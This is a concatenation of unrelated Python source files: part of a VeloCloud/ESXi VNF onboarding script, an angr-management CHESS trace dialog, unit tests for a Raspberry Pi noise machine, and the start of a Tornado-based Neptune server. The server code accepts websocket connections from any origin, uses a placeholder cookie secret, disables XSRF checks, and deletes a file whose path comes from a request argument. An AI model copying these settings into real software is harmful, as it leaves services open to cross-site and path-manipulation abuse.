                # condition inverted (slept when found, reported "Found"
                # when still missing) and omitted the host name from the
                # lookup, so it searched on the wrong host.
                if find_vswitch(sw_dict['vswitch'], vnf_property_dict['target_host']) is None:
                    time.sleep(1)
                else:
                    logging.info("Found vswitch {0}".format(sw_dict['vswitch']))
                    sw_is_added = True
            # increment retry
            switch_add_retry += 1
    # Pass 2: port groups. We don't care about speed, most important is
    # correctness, so no timing issues (sleep-and-recheck loop).
    for sw_dict in switch_list:
        for switch in esxi_host.config.network.vswitch:
            # find target switch
            if switch.name == sw_dict['vswitch']:
                pg_add_retry = 0
                pg_is_added = False
                while pg_is_added is False:
                    if pg_add_retry == 5:
                        break
                    if find_port_group(sw_dict['vswitch'], esxi_host, sw_dict['port-group-name']) is not None:
                        logging.info("Found port group {0}".format(sw_dict['port-group-name']))
                        pg_is_added = True
                    else:
                        logging.info("Adding new port group {0} to switch {1}".format(sw_dict['port-group-name'],
                                                                                      sw_dict['vswitch']))
                        AddHostPortgroup(esxi_host, sw_dict['vswitch'],
                                         sw_dict['port-group-name'],
                                         sw_dict['vlan_id'])
                        # we add / check and if not there we sleep and
                        # re-check again. The original condition was
                        # inverted here too.
                        if find_port_group(sw_dict['vswitch'], esxi_host, sw_dict['port-group-name']) is None:
                            time.sleep(1)
                        else:
                            logging.info("Found port group {0}".format(sw_dict['port-group-name']))
                            pg_is_added = True
                    # increment retry
                    pg_add_retry += 1
    if pg_is_added is True and sw_is_added is True:
        return True
    return False
def get_activation_key(config=None, edgeName=None):
    """
    Provision an edge on the VeloCloud Orchestrator and return the
    provisioning result (which carries the activation key).

    :param config: velocloud configuration section (vce-vco, vco credentials,
                   enterpriseId, profile-name)
    :param edgeName: name for the new edge
    :return: edgeEdgeProvision response object, or None on failure
    """
    activation_key = None
    client = ztp.velocloud.ApiClient(host=config['vce-vco'])
    client.authenticate(config['vco-username'], config['vco-password'], operator=False)
    api = ztp.velocloud.AllApi(client)
    try:
        params = {"enterpriseId": config['enterpriseId']}
        res = api.enterpriseGetEnterpriseConfigurations(params)
        profileId = None
        for profile in res:
            if config['profile-name'] in profile.name:
                profileId = profile.id
        # Guard: the original raised NameError when no profile matched,
        # because profileId was never assigned.
        if profileId is None:
            logging.warning("Profile {0} not found on vco.".format(config['profile-name']))
            return None
        params = {"enterpriseId": config['enterpriseId'],
                  "name": edgeName,
                  "description": "Onboarded automatically",
                  "modelNumber": "virtual",
                  "generate_certificate": False,
                  "configurationId": profileId}
        res = api.edgeEdgeProvision(params)
        return res
    except ApiException as e:
        print(e)
    return activation_key
def main_loop(ch, method, properties, body):
    """
    AMQP consumer callback: on-board a VNF for the host named in *body*.

    Validates the configured directories and the VCO hostname, requests an
    activation key from the VeloCloud Orchestrator, creates the required
    vswitches / port groups on the target ESXi host, then hands off to
    ``callback`` for OVF deployment.

    :param ch: pika channel (unused here)
    :param method: pika delivery method (unused here)
    :param properties: pika message properties (unused here)
    :param body: message payload; used directly as the target host name
    :return: False when the activation key could not be obtained
    """
    logging.info("Starting vnf on-boarding task for a host {0}".format(body))
    hostname = body
    veloconfig = config['velocloud']  # configuration section for VeloCloud
    vnf_networks = config['vnf-network']  # configuration section for esxi
    skip_queue = False
    # check that all directories are valid; any invalid path skips the message
    if os.path.isdir(veloconfig['image-dir']) is False:
        logging.warning("Error: '{0}' Image dir is invalid path {0}".format(veloconfig['image-dir']))
        skip_queue = True
    if os.path.isdir(veloconfig['vnf-dir']) is False:
        logging.warning("Error: '{0}' vnf dir is invalid path {0}".format(veloconfig['vnf-dir']))
        skip_queue = True
    # remove last slash in case client indicate it
    # NOTE(review): only a trailing backslash is stripped — presumably paths
    # are Windows-style; confirm behavior for POSIX paths ending in '/'
    if veloconfig['image-dir'].endswith('\\'):
        veloconfig['image-dir'] = veloconfig['image-dir'][:-1]
    # remove last slash in case client indicate it
    if veloconfig['vnf-dir'].endswith('\\'):
        veloconfig['vnf-dir'] = veloconfig['vnf-dir'][:-1]
    try:
        # just basic check that hostname is valid (resolvable via DNS)
        host_name = socket.gethostbyname(veloconfig['vce-vco'])
        if host_name is None or len(host_name) == 0:
            logging.warning("Invalid VCO hostname")
    except socket.gaierror as e:
        # NOTE(review): e.message is Python 2 only — this line would raise
        # AttributeError on Python 3; confirm target interpreter
        print("Exception: wrong VCO hostname. {0}".format(e.message))
    if skip_queue is False:
        try:
            logging.info("Requesting activation key from vco {0}.".format(veloconfig['vce-vco']))
            activation_key = get_activation_key(config=veloconfig, edgeName=hostname)
            if activation_key is None:
                logging.warning("Failed retrieve activation key from vco {0}.".format(veloconfig['vce-vco']))
                return False
            else:
                logging.warning("Activation key for velo cloud edge VNF {0}.".format(activation_key.activationKey))
                # we pack all properties in single dict consumed by callback()
                vnf_property_dict = {'ovf_filename': veloconfig['ovf-filename'],
                                     'vnf_dir': veloconfig['vnf-dir'],
                                     'image_dir': veloconfig['image-dir'],
                                     'target_host': hostname,
                                     'activation_code': activation_key.activationKey,
                                     'vce.vco': veloconfig['vce-vco'],
                                     'password': veloconfig['vnf-default-password'],
                                     'vnf_default_name': veloconfig['vnf-default-name']}
                logging.info("Target host system {0} {1}".format(vnf_property_dict['target_host'],
                                                                 get_uuidbyip(vnf_property_dict['target_host'])))
                create_switches(vnf_property_dict=vnf_property_dict, switch_list=vnf_networks['topology'])
                callback(vnf_property_dict=vnf_property_dict, config=config, ovf_adapt_fn=populate_ova)
        except TypeError as e:
            print(e)
            print("Exception wrong type. {0}".format(e.message))
        except KeyError as e:
            print(e)
            print("Exception key not found {0}".format(e.message))
def validate_config():
    """
    Validate that the global configuration holds all mandatory sections and
    fields for the AMQP listener and VeloCloud provisioning.

    :return: True when the configuration is complete, False otherwise
    """
    if 'ampq' not in config:
        logging.error("Error: ampq is mandatory configuration section. Please check yaml file.")
        return False
    # DRY: the three ampq fields were checked by three copy-pasted blocks.
    for field in ("username", "password", "hostname"):
        if field not in config['ampq']:
            logging.error("Error: {0} is mandatory configuration section. Please check yaml file.".format(field))
            return False
    # Guard added: the original raised KeyError when 'velocloud' was absent.
    if 'velocloud' not in config:
        logging.error("Error: velocloud is mandatory configuration section. Please check yaml file.")
        return False
    veloconfig = config['velocloud']
    # mandatory configuration elements
    mandatory_fields = ["vce-vco",
                        "ovf-filename",
                        "vnf-dir",
                        "image-dir",
                        "vnf-default-password",
                        "vnf-default-name",
                        "profile-name",
                        "enterpriseId",
                        "vco-username",
                        "vco-password"]
    for field in mandatory_fields:
        if field not in veloconfig:
            logging.error("Error: '{0}' is mandatory configuration field. check default.yaml file.".format(field))
            return False
    return True
if __name__ == "__main__":
    """
    Main entry for the VNF on-boarding listener: consumes host names from
    the 'vnfonboarding' AMQP queue and runs main_loop for each message.
    """
    if validate_config() is True:
        credentials = pika.PlainCredentials(config['ampq']['username'], config['ampq']['password'])
        connection = pika.BlockingConnection(pika.ConnectionParameters(host=config['ampq']['hostname'],
                                                                       credentials=credentials))
        # Quiet pika's own logging; it is noisy at INFO level.
        logging.getLogger("pika").setLevel(logging.WARNING)
        channel = connection.channel()
        channel.queue_declare(queue='vnfonboarding')
        # NOTE(review): no_ack=True means a message is lost if main_loop
        # fails mid-processing — confirm this is acceptable.
        channel.basic_consume(main_loop, queue='vnfonboarding', no_ack=True)
        logging.info('Waiting for VNF on boarding request. To stop press CTRL+C')
        try:
            channel.start_consuming()
        except KeyboardInterrupt:
            channel.stop_consuming()
        connection.close()
|
chess_trace_list.py | # pylint:disable=unused-argument
import typing
from typing import List, Optional, Tuple, TYPE_CHECKING
import threading
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import PySide2
from PySide2.QtWidgets import QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QMessageBox, QTableView, \
QAbstractItemView, QHeaderView, QLabel
from PySide2.QtCore import Qt, QAbstractTableModel
try:
import slacrs
except ImportError:
slacrs = None
from angrmanagement.logic.threads import gui_thread_schedule_async
if TYPE_CHECKING:
from angrmanagement.ui.workspace import Workspace
class TraceDescriptor:
    """
    Plain data holder describing a single CHESS trace.
    """

    def __init__(self, trace_id: str, input_id: str, created_at, type_: str):
        # Public attribute names are relied upon by QTraceTableModel.
        self.type = type_
        self.created_at = created_at
        self.input_id = input_id
        self.trace_id = trace_id
class QTraceTableModel(QAbstractTableModel):
    """
    Table model exposing a list of TraceDescriptor objects, one row per
    trace, with the columns declared in ``Headers``.
    """

    Headers = ["Trace ID", "Created at", "Input ID", "Input Length", "Type"]
    COL_TRACEID = 0
    COL_CREATEDAT = 1
    COL_INPUTID = 2
    COL_INPUTLENGTH = 3
    COL_TYPE = 4

    def __init__(self):
        super().__init__()
        self._traces: List[TraceDescriptor] = [ ]

    @property
    def traces(self):
        return self._traces

    @traces.setter
    def traces(self, v):
        # Wrap in a model reset so attached views refresh completely.
        self.beginResetModel()
        self._traces = v
        self.endResetModel()

    def rowCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
        return len(self.traces)

    def columnCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
        return len(self.Headers)

    def headerData(self, section:int, orientation:PySide2.QtCore.Qt.Orientation, role:int=...) -> typing.Any:
        if role != Qt.DisplayRole or section >= len(self.Headers):
            return None
        return self.Headers[section]

    def data(self, index:PySide2.QtCore.QModelIndex, role:int=...) -> typing.Any:
        if not index.isValid() or role != Qt.DisplayRole:
            return None
        row = index.row()
        if row >= len(self.traces):
            return None
        return self._get_column_text(self.traces[row], index.column())

    @staticmethod
    def _get_column_text(trace: TraceDescriptor, col: int) -> str:
        """Render the display text for *trace* in column *col*."""
        if col == QTraceTableModel.COL_TRACEID:
            return QTraceTableModel._get_trace_id(trace)
        if col == QTraceTableModel.COL_CREATEDAT:
            return QTraceTableModel._get_trace_created_at(trace)
        if col == QTraceTableModel.COL_INPUTID:
            return QTraceTableModel._get_trace_input_id(trace)
        if col == QTraceTableModel.COL_INPUTLENGTH:
            # Input length is not tracked on TraceDescriptor.
            return "Unknown"
        if col == QTraceTableModel.COL_TYPE:
            return QTraceTableModel._get_trace_type(trace)
        raise KeyError(col)

    @staticmethod
    def _get_trace_id(trace: TraceDescriptor) -> str:
        return trace.trace_id

    @staticmethod
    def _get_trace_created_at(trace: TraceDescriptor) -> str:
        return trace.created_at

    @staticmethod
    def _get_trace_type(trace: TraceDescriptor) -> str:
        return trace.type

    @staticmethod
    def _get_trace_input_id(trace: TraceDescriptor) -> str:
        return trace.input_id
class QTraceTableView(QTableView):
    """
    Implements a trace view for CHESS traces.

    Read-only table with row-based multi-selection and auto-sized columns,
    backed by a QTraceTableModel.
    """
    def __init__(self):
        super().__init__()
        self.horizontalHeader().setVisible(True)
        self.verticalHeader().setVisible(False)
        # Select whole rows; allow several traces to be chosen at once.
        self.setSelectionBehavior(QAbstractItemView.SelectRows)
        self.setSelectionMode(QAbstractItemView.MultiSelection)
        self.setHorizontalScrollMode(self.ScrollPerPixel)
        self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
        self.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
        # NOTE: this attribute shadows QTableView.model(); callers in this
        # file access it as an attribute (e.g. self._table.model.traces).
        self.model: QTraceTableModel = QTraceTableModel()
        self.setModel(self.model)
class QChessTraceListDialog(QDialog):
    """
    CHESS trace list dialog: loads traces of the connected target from the
    slacrs backend and lets the user pick traces to open. Selected
    (input_id, trace_id) pairs end up in ``self.trace_ids``.
    """

    def __init__(self, workspace: 'Workspace', parent=None):
        super().__init__(parent)

        if slacrs is None:
            # Bugfix: the original called QMessageBox.Critical, which is the
            # icon enum value; the static method that shows a dialog is
            # QMessageBox.critical().
            QMessageBox.critical(self,
                                 "Slacrs is not installed",
                                 "Cannot import slacrs. Please make sure slacrs is properly installed.",
                                 QMessageBox.Ok)
            self.close()
            return

        self.workspace = workspace
        self.trace_ids: Optional[List[Tuple[str,str]]] = None  # input ID, trace ID
        self.setMinimumWidth(400)

        self._status_label: QLabel = None
        self._table: QTraceTableView = None
        self._ok_button: QPushButton = None
        self._cancel_button: QPushButton = None

        self.setWindowTitle("Open traces from CHECRS")
        self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)

        self._init_widgets()

        self._status_label.setText("Loading...")
        self.workspace.main_window.app.processEvents()

        # Load traces off the GUI thread; results come back through
        # gui_thread_schedule_async -> _update_table.
        th = threading.Thread(target=self._load_traces, daemon=True)
        th.start()

    def _init_widgets(self):
        """Build the table, the status line, and the Ok/Cancel buttons."""
        # table
        self._table = QTraceTableView()
        # status
        status_lbl = QLabel("Status:")
        self._status_label = QLabel()
        status_layout = QHBoxLayout()
        status_layout.addWidget(status_lbl)
        status_layout.addWidget(self._status_label)
        status_layout.addStretch(0)
        # buttons
        self._ok_button = QPushButton("Ok")
        self._ok_button.clicked.connect(self._on_ok_button_clicked)
        self._cancel_button = QPushButton("Cancel")
        self._cancel_button.clicked.connect(self._on_cancel_button_clicked)
        buttons_layout = QHBoxLayout()
        buttons_layout.addWidget(self._ok_button)
        buttons_layout.addWidget(self._cancel_button)
        layout = QVBoxLayout()
        layout.addWidget(self._table)
        layout.addLayout(status_layout)
        layout.addLayout(buttons_layout)
        self.setLayout(layout)

    def _load_traces(self):
        """Query slacrs for traces of the connected target (worker thread)."""
        from slacrs.model import Input, Trace  # pylint:disable=import-outside-toplevel,import-error
        asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())

        # Cleanup: the original looked the plugin up twice in a row with
        # identical checks; once is enough.
        connector = self.workspace.plugins.get_plugin_instance_by_name("ChessConnector")
        if connector is None:
            # chess connector does not exist
            return
        slacrs_instance = connector.slacrs_instance()
        if slacrs_instance is None:
            # slacrs does not exist. continue
            return
        session = slacrs_instance.session()
        target_image_id = connector.target_image_id
        if not target_image_id:
            return
        traces: List[TraceDescriptor] = [ ]
        db_traces = session.query(Trace).join(Trace.input).filter(
            Input.target_image_id == target_image_id
        )
        for db_trace in db_traces:
            db_trace: Trace
            t = TraceDescriptor(db_trace.id, db_trace.input_id, db_trace.created_at, "block trace")
            traces.append(t)
        session.close()

        gui_thread_schedule_async(self._update_table, args=(traces,))

    def _update_table(self, traces):
        """GUI-thread callback: populate the table with *traces*."""
        self._table.model.traces = traces
        self._table.viewport().update()
        self._status_label.setText("Ready.")

    #
    # Events
    #

    def _on_ok_button_clicked(self):
        selection_model = self._table.selectionModel()
        if not selection_model.hasSelection():
            QMessageBox.warning(self,
                                "No target is selected",
                                "Please select a CHESS target to continue.",
                                QMessageBox.Ok)
            return
        rows = selection_model.selectedRows()
        self.trace_ids = [ ]
        for row in rows:
            trace = self._table.model.traces[row.row()]
            self.trace_ids.append((trace.input_id, trace.trace_id))
        self.close()

    def _on_cancel_button_clicked(self):
        self.close()
|
test_noisemachine.py | from enum import auto
import unittest
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
from noisemachine import NoiseMachine
from os import chdir
from os.path import realpath, split
from unittest import mock
from unittest.mock import patch
from time import sleep
import threading
# Use gpiozero's mock pin factory so the tests can drive pin state purely in
# software, without real Raspberry Pi hardware attached.
Device.pin_factory = MockFactory()
# Set the current directory to be in the same place as the test script.
chdir(split(realpath(__file__))[0])
class TestNoiseMachine(unittest.TestCase):
    """
    Exercises NoiseMachine button handling through gpiozero's mock pins,
    with subprocess.Popen patched out so no audio is actually played.
    The sleep() calls give the monitor thread time to classify presses
    (single vs. double) — timing-sensitive by design.
    """
    def setUp(self):
        # Fresh machine and monitor thread per test; stop_event ends the thread.
        self.machine = NoiseMachine()
        self.stop_event = threading.Event()
        self.monitor_thread = threading.Thread(target=self.machine.monitor, args=[self.stop_event])
        self.monitor_thread.start()
    def tearDown(self) -> None:
        self.stop_event.set()
        # Release the mock GPIO pins so the next test can re-create them.
        for button in self.machine.buttons.values():
            button.gpio_object.close()
    def test_init(self):
        """Machine should come up with five configured buttons."""
        self.assertNotEqual(self.machine.buttons, [])
        self.assertEqual(len(self.machine.buttons), 5)
    def test_single_button_single_action(self):
        """A single press on pin 5 plays 5-single.wav."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            self.machine.buttons[5].gpio_object.pin.drive_high()
            sleep(0.1)
            self.machine.buttons[5].gpio_object.pin.drive_low()
            sleep(0.5)
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertTrue(mock_patch.called)
            self.assertEqual(mock_patch.call_args.args[0][3], '5-single.wav')
    def test_double_button_single_action(self):
        """Two quick presses on pin 5 play 5-double.wav."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            self.machine.buttons[5].gpio_object.pin.drive_high()
            sleep(0.05)
            self.machine.buttons[5].gpio_object.pin.drive_low()
            sleep(0.1)
            self.machine.buttons[5].gpio_object.pin.drive_high()
            sleep(0.05)
            self.machine.buttons[5].gpio_object.pin.drive_low()
            sleep(0.5)
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertTrue(mock_patch.called)
            self.assertEqual(mock_patch.call_args.args[0][3], '5-double.wav')
    def test_single_button_random_action(self):
        """Pin 26 single presses pick one of the three random files each time."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            for _ in range(0, 5):
                self.machine.buttons[26].gpio_object.pin.drive_high()
                sleep(0.1)
                self.machine.buttons[26].gpio_object.pin.drive_low()
                sleep(0.5)
                self.assertIn(mock_patch.call_args.args[0][3], ['26-single-random-1.wav', '26-single-random-2.wav', '26-single-random-3.wav'])
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertTrue(mock_patch.called)
            self.assertEqual(mock_patch.call_count, 5)
    def test_double_button_random_action(self):
        """Pin 26 double presses pick one of the three double-random files."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            for _ in range(0, 5):
                self.machine.buttons[26].gpio_object.pin.drive_high()
                sleep(0.05)
                self.machine.buttons[26].gpio_object.pin.drive_low()
                sleep(0.1)
                self.machine.buttons[26].gpio_object.pin.drive_high()
                sleep(0.05)
                self.machine.buttons[26].gpio_object.pin.drive_low()
                sleep(0.5)
                self.assertIn(mock_patch.call_args.args[0][3], ['26-double-random-1.wav', '26-double-random-2.wav', '26-double-random-3.wav'])
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertTrue(mock_patch.called)
            self.assertEqual(mock_patch.call_count, 5)
    def test_unassigned_action(self):
        """Pin 6 has no sound mapped; nothing should be played."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            self.machine.buttons[6].gpio_object.pin.drive_high()
            sleep(0.1)
            self.machine.buttons[6].gpio_object.pin.drive_low()
            sleep(0.5)
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertFalse(mock_patch.called)
    def test_single_button_sequence_action(self):
        """Pin 19 single presses play the sequence files in order."""
        expected_files = ['19-single-sequence-1.wav', '19-single-sequence-2.wav', '19-single-sequence-3.wav']
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            for i in range(0, 3):
                self.machine.buttons[19].gpio_object.pin.drive_high()
                sleep(0.1)
                self.machine.buttons[19].gpio_object.pin.drive_low()
                sleep(0.5)
                self.assertEqual(mock_patch.call_args.args[0][3], expected_files[i])
            self.assertTrue(self.monitor_thread.is_alive())
    def test_double_button_sequence_action(self):
        """Pin 19 double presses play the double-sequence files in order."""
        expected_files = ['19-double-sequence-1.wav', '19-double-sequence-2.wav', '19-double-sequence-3.wav']
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            for i in range(0, 3):
                self.machine.buttons[19].gpio_object.pin.drive_high()
                sleep(0.05)
                self.machine.buttons[19].gpio_object.pin.drive_low()
                sleep(0.1)
                self.machine.buttons[19].gpio_object.pin.drive_high()
                sleep(0.05)
                self.machine.buttons[19].gpio_object.pin.drive_low()
                sleep(0.5)
                self.assertEqual(mock_patch.call_args.args[0][3], expected_files[i])
            self.assertTrue(self.monitor_thread.is_alive())
    def test_playback_interrupt(self):
        """A second press while playback is running terminates the player."""
        with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
            # poll() returning None simulates a still-running player process.
            mock_patch.return_value.poll.return_value = None
            self.machine.buttons[5].gpio_object.pin.drive_high()
            sleep(0.05)
            self.machine.buttons[5].gpio_object.pin.drive_low()
            sleep(1)
            self.machine.buttons[5].gpio_object.pin.drive_high()
            sleep(0.05)
            self.machine.buttons[5].gpio_object.pin.drive_low()
            sleep(0.5)
            self.assertTrue(self.monitor_thread.is_alive())
            self.assertTrue(mock_patch.called)
            self.assertEqual(mock_patch.call_args.args[0][3], '5-single.wav')
            self.assertTrue(mock_patch.return_value.terminate.called)
|
server.py | #!/usr/bin/python
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# logging should be setup first so imported modules' logging is configured too
import os
from vai.dpuv1.rt import logging_mp
# Logging must be configured before the neptune modules are imported so
# their loggers inherit this configuration (see the note above the imports).
log_file = os.environ['VAI_ALVEO_ROOT'] + "/../demo/neptune/logging.ini"
logging_mp.setup_logger(log_file, 'neptune')
from datetime import datetime
import json
import signal
import threading
import time
import tornado.ioloop
import tornado.web
import tornado.websocket
import uuid
import importlib
import logging
import six
if six.PY3:
import asyncio
import numpy as np
from tornado.options import define, options, parse_command_line
if six.PY3:
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from neptune.common import DummyClass, list_submodules, hinted_tuple_hook
if six.PY3:
from neptune.common_py3 import cancel_async_tasks
else:
from neptune.common import cancel_async_tasks
import neptune.construct as construct
from neptune.service_manager import ServiceManager
from neptune.node_manager import NodeManager
from vai.dpuv1.rt import xstream
# Command-line options parsed by tornado.options (see parse_command_line in
# ServerApp.__init__): HTTP port, websocket port, and debug mode.
define("port", default=8998, help="run web server on this port", type=int)
define("wsport", default=8999, help="run websocket server on this port", type=int)
define("debug", default=True, help="run in debug mode")
logger = logging.getLogger(__name__)
class IndexHandler(tornado.web.RequestHandler):
    """Serve the landing page, parameterized with the websocket port."""
    def get(self, *args):
        self.render("index.html", wsport=options.wsport)
class ListServiceHandler(tornado.web.RequestHandler):
    """Return a JSON listing of all known services, sorted by name."""

    def get(self, *args):
        ret = {'services': []}
        try:
            services = [
                {
                    'name': name,
                    'state': svc['state'],
                    'url': svc['url'],
                    'throughput': svc['throughput'],
                }
                for name, svc in ServiceManager().list().items()
            ]
            services.sort(key=lambda entry: entry['name'])
            ret = {'services': services}
        except Exception:
            logger.exception("List service error")
        # On failure the pre-initialized empty listing is returned.
        self.write(json.dumps(ret, sort_keys=True))
class QueryServiceHandler(tornado.web.RequestHandler):
    """Return the JSON description of a single service (minus its object)."""

    def get(self, *args):
        service_name = self.get_argument("service")
        ret = {}
        try:
            services_list = ServiceManager().list()
            if service_name in services_list:
                # Copy before deleting: the original did
                # `ret = services_list[name]; del ret['service']`, which
                # mutated the dict returned by ServiceManager().list() —
                # shared state, presumably; confirm whether list() returns
                # copies. pop(..., None) also avoids a KeyError when the
                # 'service' key is absent.
                ret = dict(services_list[service_name])
                ret.pop('service', None)
        except Exception:
            logger.exception("Query service error")
        self.write(json.dumps(ret, sort_keys=True))
class StartServiceHandler(tornado.web.RequestHandler):
    """Start a service by id, via query string (GET) or JSON body (POST)."""

    def get(self, *args):
        service_name = self.get_argument("id")
        runtime_args = self.get_argument("args", {})
        ServiceManager().start(service_name, runtime_args)
        self.write("service started")

    def post(self, *args):
        data = json.loads(self.request.body)
        # service id arrives in unicode; optional runtime args default to {}
        runtime_args = data.get("args", {})
        ServiceManager().start(data["id"], runtime_args)
        self.write("service started")
class StopServiceHandler(tornado.web.RequestHandler):
    """Stop a running service by id."""

    def get(self, *args):
        ServiceManager().stop(self.get_argument("id"))
        self.write("service stopped")
class ConstructServiceHandler(tornado.web.RequestHandler):
    """Construct a new service from a recipe POSTed as JSON."""

    def get(self, *args):
        self.write("POST a recipe to this address to construct it")

    def post(self, *args):
        """
        Parse JSON arguments in POST body. In Requests module, use json key to
        pass in arguments, not data (which may clobber JSON objects)
        """
        recipe = json.loads(self.request.body, object_hook=hinted_tuple_hook)
        handler = construct.construct(recipe)
        # match any host
        self.application.add_handlers(r".*", handler)
        self.write("service %s constructed at /serve/%s" % (str(recipe['name']), str(recipe['url'])))
# FIXME clients being able to destroy services others may be using is problematic
class DestructServiceHandler(tornado.web.RequestHandler):
    """Destroy a constructed service: remove its route, its ServiceManager
    entry, and its cached recipe file."""
    def _destroy(self):
        """Locate the router rule serving the requested url.

        Returns (rule_index, service_name, url); rule_index is -1 when no
        matching route exists.
        """
        url = str(self.get_argument("url"))
        name = str(self.get_argument("name"))
        fake_request = DummyClass()
        found_index = -1
        # There's no method in Tornado to delete an added handler currently.
        # By examining the source, the code below works to do so. If Tornado
        # adds an API to do this, this code should be replaced. It may also
        # break with changes to Tornado (tested with Tornado 5.1.1 on 8/15/2019)
        for index, parent_rule in enumerate(self.application.default_router.rules):
            rules = parent_rule.target.rules
            for rule in rules:
                fake_request.path = r"/serve/" + url
                if isinstance(rule.matcher.match(fake_request), dict):
                    found_index = index
        return found_index, name, url
    def get(self, *args):
        self.write("POST the name and url of the service to destroy") # TODO only should specify one
    def post(self, *args):
        found_index, name, url = self._destroy()
        if found_index != -1:
            del self.application.default_router.rules[found_index]
            ServiceManager().remove(name)
            # Remove the cached recipe so the service is not reconstructed
            # on the next server start (see ServerApp.get_recipes).
            recipe_cache = os.environ["VAI_ALVEO_ROOT"] + "/../demo/neptune/recipes/recipe_%s.bak" % name
            os.remove(recipe_cache)
            self.write("service destroyed at /serve/%s" % url)
        else:
            self.write("Service %s cannot be destroyed as it does not exist" % name)
class RenderHandler(tornado.web.RequestHandler):
    """Render the template named after the last path component of the URL."""

    def get(self, *args):
        page = self.request.uri.split('/')[-1]
        self.render(page + ".html", wsport=options.wsport)
class RequestIdGenerator(object):
    """Hands out sequential request ids per name, wrapping at 10000."""

    def __init__(self):
        # name -> next id to hand out
        self.handler_ids = {}

    def get(self, name='__default__'):
        curr_id = self.handler_ids.setdefault(name, 0)
        self.handler_ids[name] = (curr_id + 1) % 10000  # wraparound
        return curr_id
class WebSocketHandler(tornado.websocket.WebSocketHandler):
    """Pushes server events (speedometer data, service callbacks) out to
    connected browser clients."""
    # All live connections; class-level so the static broadcast/send_to_client
    # helpers can reach every client.
    clientConnections = []
    def __init__(self, *args, **kwargs):
        super(WebSocketHandler, self).__init__(*args, **kwargs)
        print("[WS] websocket ready")
    def open(self):
        # Assign a fresh id and tell the client, so it can re-claim its old
        # id after a reconnect (see on_message / 'update_id').
        self.id = str(uuid.uuid4())
        self.last_send = None
        print("[WS] websocket opened %s" % self.id)
        self.send('id', self.id)
        WebSocketHandler.clientConnections.append(self)
    def on_message(self, messageStr):
        try:
            print('[WS] message received from %s: %s' % (self.id, messageStr))
            message = json.loads(messageStr)
            if message['topic'] == 'update_id':
                origId = message['id']
                self.id = origId # take over original id
        except:
            # best-effort: malformed client messages are ignored
            pass
    def on_close(self):
        print("[WS] websocket closed %s" % self.id)
        WebSocketHandler.clientConnections.remove(self)
    def send(self, topic, msg):
        """Send one message; rate-limited to one per 50 ms per client."""
        if not msg:
            return
        now = time.time()
        if self.last_send and (now - self.last_send) < 0.05:
            # don't flood the client with too many messages; drop
            return
        self.last_send = now
        try:
            msg_POD = {}
            msg_POD['time'] = datetime.now().isoformat()
            msg_POD['topic'] = topic
            msg_POD['message'] = msg
            self.write_message(json.dumps(msg_POD))
        except Exception as e:
            print(e)
    @staticmethod
    def send_to_client(id, topic, msg):
        """Send to the client whose id matches; errors are swallowed."""
        try:
            for c in WebSocketHandler.clientConnections:
                if c.id == id:
                    c.send(topic, msg)
        except:
            pass
    @staticmethod
    def broadcast(topic, msg):
        """Send to every connected client; errors are swallowed."""
        try:
            for c in WebSocketHandler.clientConnections:
                c.send(topic, msg)
        except:
            pass
    def check_origin(self, origin):
        # Allow cross-origin websocket connections.
        return True
class ServerWebApplication(tornado.web.Application):
    """Tornado web application hosting the core (non-destroyable) REST
    endpoints of the Neptune server."""

    def __init__(self):
        self.request_id_gen = RequestIdGenerator()
        super(ServerWebApplication, self).__init__(
            self.init_handlers(),
            cookie_secret="COOKIE_SECRET",
            template_path=os.path.join(os.path.dirname(__file__), "templates"),
            static_path=os.path.join(os.path.dirname(__file__), "static"),
            xsrf_cookies=False, #? should be true?
            autoreload=False,
            debug=options.debug
        )

    def init_handlers(self):
        """
        Define the basic REST handlers. These cannot be destroyed.

        Returns:
            List: List of handler tuples for initializing a Tornado web app
        """
        return [
            (r"/", IndexHandler),
            (r"/services/list", ListServiceHandler),
            (r"/services/query", QueryServiceHandler),
            (r"/services/start", StartServiceHandler),
            (r"/services/stop", StopServiceHandler),
            (r"/services/construct", ConstructServiceHandler),
            (r"/services/destruct", DestructServiceHandler),
            (r"/render/([^/]+)", RenderHandler),
        ]
class ServerApp(object):
def __init__(self):
signal.signal(signal.SIGINT, self.signal_handler)
# signal.signal(signal.SIGQUIT, self.sigquit_handler)
self.do_exit = False
self.hbeat_id = 0
self.hbeat = 0
# self.do_restart = False
self.xserver = xstream.Server()
parse_command_line()
self.web_app = ServerWebApplication()
# Add handlers for default services here so they can be destroyed if
# needed. Handlers installed in the web_app __init__ cannot be destroyed.
recipes = self.get_recipes()
for recipe in recipes:
tornado_handler = construct.construct(recipe)
self.web_app.add_handlers(
r".*", # match any host
tornado_handler
)
self.web_server = self.web_app.listen(options.port)
self.ws_app = tornado.web.Application([(r"/", WebSocketHandler)])
